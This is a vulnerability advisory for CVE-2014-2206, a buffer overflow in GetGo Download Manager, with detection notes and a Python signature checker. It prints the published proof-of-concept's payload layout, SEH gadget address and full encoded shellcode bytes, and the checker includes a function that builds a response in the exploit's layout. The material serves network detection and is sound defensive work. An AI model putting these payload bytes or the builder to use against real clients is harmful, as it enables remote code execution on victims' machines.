CVE-2014-2206
published 2014-03-05


Priority: P2 (69) · Severity: critical · CVSS 2.0 base score: 10
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Exploit: public PoC and Metasploit module available
EPSS: 61.44% (99.1st percentile)
Stack-based buffer overflow in GetGo Download Manager 4.9.0.1982, 4.8.2.1346, 4.4.5.502, and earlier allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a long HTTP Response Header.

Affected (3 ranges)

Vendor      Product                  Version range    Fixed in
getgosoft   getgo_download_manager   <= 4.4.5.502
getgosoft   getgo_download_manager
getgosoft   getgo_download_manager

Detection & IOCs (extracted from sources)

command: HTTP/1.1 200 <4107 bytes junk>\x90\x90\xEB\x06<SEH>\x90*50<shellcode>\r\n
bytes (payload layout): \x90 * 4107 (junk) + \x90\x90\xEB\x06 (nSEH: two NOPs, then jmp short +6) + \x0b\x0b\x28\x00 (SEH: 0x00280b0b in x86 little-endian byte order) + \x90 * 50 (NOPs)
bytes (shellcode from the PoC; the \xd9\x74\x24\xf4 fnstenv sequence near the start is the GetPC stub of a Metasploit shikata_ga_nai-style encoder, so these exact bytes change on every encoding run and are a weak signature on their own):
\xda\xca\xbb\xfd\x11\xa3\xae\xd9\x74\x24\xf4\x5a\x31\xc9\xb1\x33\x31\x5a\x17\x83\xc2\x04\x03\xa7\x02\x41\x5b\xab\xcd\x0c\xa4\x53\x0e\x6f\x2c\xb6\x3f\xbd\x4a\xb3\x12\x71\x18\x91\x9e\xfa\x4c\x01\x14\x8e\x58\x26\x9d\x25\xbf\x09\x1e\x88\x7f\xc5\xdc\x8a\x03\x17\x31\x6d\x3d\xd8\x44\x6c\x7a\x04\xa6\x3c\xd3\x43\x15\xd1\x50\x11\xa6\xd0\xb6\x1e\x96\xaa\xb3\xe0\x63\x01\xbd\x30\xdb\x1e\xf5\xa8\x57\x78\x26\xc9\xb4\x9a\x1a\x80\xb1\x69\xe8\x13\x10\xa0\x11\x22\x5c\x6f\x2c\x8b\x51\x71\x68\x2b\x8a\x04\x82\x48\x37\x1f\x51\x33\xe3\xaa\x44\x93\x60\x0c\xad\x22\xa4\xcb\x26\x28\x01\x9f\x61\x2c\x94\x4c\x1a\x48\x1d\x73\xcd\xd9\x65\x50\xc9\x82\x3e\xf9\x48\x6e\x90\x06\x8a\xd6\x4d\xa3\xc0\xf4\x9a\xd5\x8a\x92\x5d\x57\xb1\xdb\x5e\x67\xba\x4b\x37\x56\x31\x04\x40\x67\x90\x61\xbe\x2d\xb9\xc3\x57\xe8\x2b\x56\x3a\x0b\x86\x94\x43\x88\x23\x64\xb0\x90\x41\x61\xfc\x16\xb9\x1b\x6d\xf3\xbd\x88\x8e\xd6\xdd\x4f\x1d\xba\x0f\xea\xa5\x59\x50
  • The exploit triggers via a malicious HTTP response: the overflow is embedded in the status line itself, in the reason phrase after "HTTP/1.1 200 ", rather than in a named header field. Detect anomalously large HTTP response status lines (reason phrase over ~4000 bytes) served to GetGo Download Manager clients.
  • The SEH overwrite uses address 0x00280b0b (call dword ptr ss:[ebp+30]), sourced from outside any loaded module to bypass SafeSEH. Look for SEH chain entries pointing to this address in crash dumps or memory forensics.
  • The PoC uses exactly 4107 bytes of padding before the nSEH/SEH overwrite. Network signatures should flag HTTP responses whose status-line reason phrase exceeds ~4100 bytes; legitimate reason phrases are a few words, so a far lower threshold is safe in practice.
  • The attack vector is a victim downloading a file from an attacker-controlled server. Monitor GetGo Download Manager process network connections to untrusted HTTP servers, especially those returning oversized response status lines or headers.
  • The nSEH sequence \x90\x90\xEB\x06 followed by the 4-byte SEH value \x0b\x0b\x28\x00 (0x00280b0b in little-endian byte order) is a distinctive pattern for IDS/IPS signatures. Because the two leading NOPs of the nSEH blend into the NOP padding in front of them, the bytes worth anchoring on are \xEB\x06\x0b\x0b\x28\x00.
  • The PoC exploit was tested only on Windows XP SP3 (German locale). The hardcoded SEH gadget address (0x00280b0b) is environment-specific and may not be valid on other OS versions or patch levels, so a signature on that address catches the published PoC rather than every exploitation of the bug.
  • The Metasploit module covers a broader version range (up to 5.3.0.2712) than the PoC (4.9.0.1982). Detection rules should not be limited to the versions named in the CVE description (4.9.0.1982, 4.8.2.1346, 4.4.5.502, and earlier); treat releases up to 5.3.0.2712 as affected as well.
  • All loaded modules in the tested environment are SafeSEH-enabled, which is why the exploit sources its SEH gadget from outside loaded modules. Environments with a different module layout require a different gadget address.
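The detection notes above, turned into a small checker as an added example (it is not the PoC, the Metasploit module, or GetGo's code). The thresholds and byte values are the ones listed above; the sample responses, the stand-in shellcode, and the helper names (inspect_response, build_poc_response) are constructed here for the demonstration. The code also encodes the byte-order point: on x86 the SEH gadget 0x00280b0b travels on the wire as \x0b\x0b\x28\x00, and since the nSEH's leading NOPs merge into the NOP padding, the signature it matches is the short jump plus that address.

```python
"""Checker for the CVE-2014-2206 response pattern (added example, not the PoC
or vendor code). Runs three checks over one raw HTTP response: oversized
status-line reason phrase, the jmp-short + SEH-address byte sequence, and
whether the padding matches the published PoC layout exactly."""

from __future__ import annotations
from dataclasses import dataclass

STATUS_LINE_LIMIT = 4000              # reason phrases longer than this are anomalous
PADDING_LEN = 4107                    # junk bytes before nSEH in the PoC
NSEH = b"\x90\x90\xEB\x06"            # two NOPs, then "jmp short +6"
SEH_ADDR = 0x00280B0B                 # call dword ptr ss:[ebp+30], outside loaded modules
SEH = SEH_ADDR.to_bytes(4, "little")  # b"\x0b\x0b\x28\x00": little-endian on the wire

# The NOPs of nSEH are indistinguishable from the NOP padding in front of them,
# so the distinctive bytes are the short jump followed by the SEH address.
SEH_SIGNATURE = NSEH[2:] + SEH        # b"\xEB\x06\x0b\x0b\x28\x00"


@dataclass(frozen=True)
class Finding:
    rule: str
    detail: str


def split_status_line(raw: bytes) -> tuple[bytes, bytes]:
    """Return (status_line, remainder); a response with no line end is one status line."""
    end = raw.find(b"\n")
    if end == -1:
        return raw, b""
    line = raw[:end]
    if line.endswith(b"\r"):
        line = line[:-1]
    return line, raw[end + 1:]


def parse_status_line(line: bytes) -> tuple[bytes, bytes, bytes]:
    """Split b'HTTP/1.1 200 <reason>' into (version, code, reason); reason may be empty."""
    parts = line.split(b" ", 2)
    while len(parts) < 3:
        parts.append(b"")
    return parts[0], parts[1], parts[2]


def inspect_response(raw: bytes) -> list[Finding]:
    """Apply the three checks from the IOC notes; an empty list means nothing matched."""
    findings: list[Finding] = []
    status_line, _ = split_status_line(raw)
    _version, _code, reason = parse_status_line(status_line)

    # Check 1: an anomalously long reason phrase (the PoC stuffs ~4.2 KB into it).
    if len(reason) > STATUS_LINE_LIMIT:
        findings.append(Finding("oversized-status-line",
                                f"reason phrase is {len(reason)} bytes"))

    # Check 2: the jmp-short + SEH-address sequence anywhere in the response,
    # so a variant that moves the payload out of the status line is still caught.
    sig_at = raw.find(SEH_SIGNATURE)
    if sig_at != -1:
        findings.append(Finding("seh-overwrite-pattern",
                                f"EB 06 + 0x{SEH_ADDR:08x} (LE) at offset {sig_at}"))
        # Check 3: the exact PoC layout, nSEH sitting PADDING_LEN bytes into the reason.
        if reason.find(NSEH + SEH) == PADDING_LEN:
            findings.append(Finding("poc-layout",
                                    f"nSEH at reason offset {PADDING_LEN}, as in the PoC"))
    return findings


def is_malicious(raw: bytes) -> bool:
    return bool(inspect_response(raw))


def build_poc_response(shellcode: bytes, padding: int = PADDING_LEN) -> bytes:
    """Constructed response in the PoC's layout: the whole payload rides in the status line.
    The shellcode is whatever the caller passes (the test uses a stand-in)."""
    return (b"HTTP/1.1 200 " + b"\x90" * padding + NSEH + SEH
            + b"\x90" * 50 + shellcode + b"\r\n")


if __name__ == "__main__":
    benign = b"HTTP/1.1 200 OK\r\nContent-Length: 5\r\n\r\nhello"   # constructed
    hostile = build_poc_response(b"\xCC" * 32)                        # stand-in shellcode
    for f in inspect_response(hostile):
        print(f.rule, "-", f.detail)
    print("benign flagged:", is_malicious(benign))
```

The length check alone catches the PoC and any re-encoded variant of it; the signature check is what ties a hit to this specific gadget, and the layout check tells an analyst whether what they are looking at is the published PoC verbatim.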